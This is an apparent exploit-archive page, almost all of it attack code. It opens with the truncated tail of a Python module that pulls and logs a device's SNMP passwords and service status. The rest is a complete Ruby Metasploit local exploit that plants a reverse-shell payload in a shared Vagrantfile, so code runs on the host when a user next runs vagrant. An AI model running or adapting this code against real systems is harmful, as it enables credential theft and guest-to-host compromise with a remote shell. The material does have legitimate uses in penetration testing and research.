Barcode: " + root[88].text) module.log("Device Revision String: " + root[104].text) module.log("Device Firmware: " + root[105].text) module.log("Panel Key Name: " + root[109].text) module.log("SNMP Username: " + root[148].text) module.log("SNMP Private Password: " + root[149].text) module.log("SNMP Authorization Password: " + root[150].text) # Determine Running Services if int(root[48].text) == 1: module.log("Telnet Enabled") else: module.log("Telnet Disabled") if int(root[84].text) == 1: module.log("Wireless Enabled") else: module.log("Wireless Disabled") if int(root[103].text) == 3: module.log("Webserver Enabled") else: module.log("Webserver Disabled") except requests.exceptions.RequestException as e: logging.error('{}'.format(e)) return if __name__ == '__main__': module.run(metadata, run) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Vagrant Synced Folder Vagrantfile Breakout', 'Description' => %q{ This module exploits a default Vagrant synced folder (shared folder) to append a Ruby payload to the Vagrant project Vagrantfile config file. By default, unless a Vagrant project explicitly disables shared folders, Vagrant mounts the project directory on the host as a writable 'vagrant' directory on the guest virtual machine. This directory includes the project Vagrantfile configuration file. Ruby code within the Vagrantfile is loaded and executed when a user runs any vagrant command from the project directory on the host, leading to execution of Ruby code on the host. }, 'License' => MSF_LICENSE, 'Author' => [ 'HashiCorp', # Vagrant defaults 'bcoles' # Metasploit ], 'DisclosureDate' => '2011-01-19', # Vagrant 0.7.0 release date - first mention of shared folders in CHANGELOG 'Platform' => %w[ruby], 'Arch' => ARCH_ALL, 'SessionTypes' => [ 'shell', 'powershell', 'meterpreter' ], 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'Targets' => [ [ 'Ruby Code', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Type' => :ruby, 'DefaultOptions' => { 'PAYLOAD' => 'ruby/shell_reverse_tcp' } } ], [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '`' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ] ], 'DefaultTarget' => 0, 'References' => [ ['URL', 'https://www.vagrantup.com/docs/synced-folders'], ['URL', 'https://www.virtualbox.org/manual/ch04.html#sharedfolders'] ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ] } ) ) register_options([ OptString.new('VAGRANTFILE_PATH', [false, 'Path to Vagrantfile (leave blank to auto detect)', '']) ]) end # Search potential default shared directories for Vagrantfile configuration file def find_vagrantfile_path unless datastore['VAGRANTFILE_PATH'].blank? return exists?(datastore['VAGRANTFILE_PATH']) ? datastore['VAGRANTFILE_PATH'] : nil end # Default Vagrant synced folders (aka shared folders) default_shared_directories = [ 'C:\\vagrant\\', '/vagrant/' ] default_shared_directories.each do |dir_path| begin vagrant_shared_dir_contents = dir(dir_path) rescue Rex::Post::Meterpreter::RequestError next end next if vagrant_shared_dir_contents.empty? # Vagrant project configuration file name is case-insensitive (typically "Vagrantfile") vagrant_shared_dir_contents.each do |fname| return "#{dir_path}#{fname}" if fname.downcase == 'vagrantfile' end end nil end def vagrantfile @vagrantfile ||= find_vagrantfile_path end def check return CheckCode::Safe('Vagrantfile not found.') unless vagrantfile # `writable?' method does not support Windows systems begin return CheckCode::Detected("#{vagrantfile} is not writable.") unless writable?(vagrantfile) rescue RuntimeError return CheckCode::Detected("Could not verify if #{vagrantfile} is writable.") end CheckCode::Appears("#{vagrantfile} is writable!") end def exploit fail_with(Failure::NotVulnerable, 'Could not find Vagrantfile') unless vagrantfile case target['Type'] when :ruby data = payload.encoded when :unix_cmd data = "`#{payload.encoded}`" else fail_with(Failure::NoTarget, 'No target selected') end print_status("Appending payload (#{data.length} bytes) to #{vagrantfile} ...") unless append_file(vagrantfile, "\n#{data}\n") fail_with(Failure::Unknown, "Could not write to #{vagrantfile}") end print_status("Payload appended to #{vagrantfile}") print_status('The payload will be executed when a user runs any vagrant command from within the project directory on the host system.') print_warning("This module requires manual removal of the payload from the project Vagrantfile: #{vagrantfile}") end end </code></pre>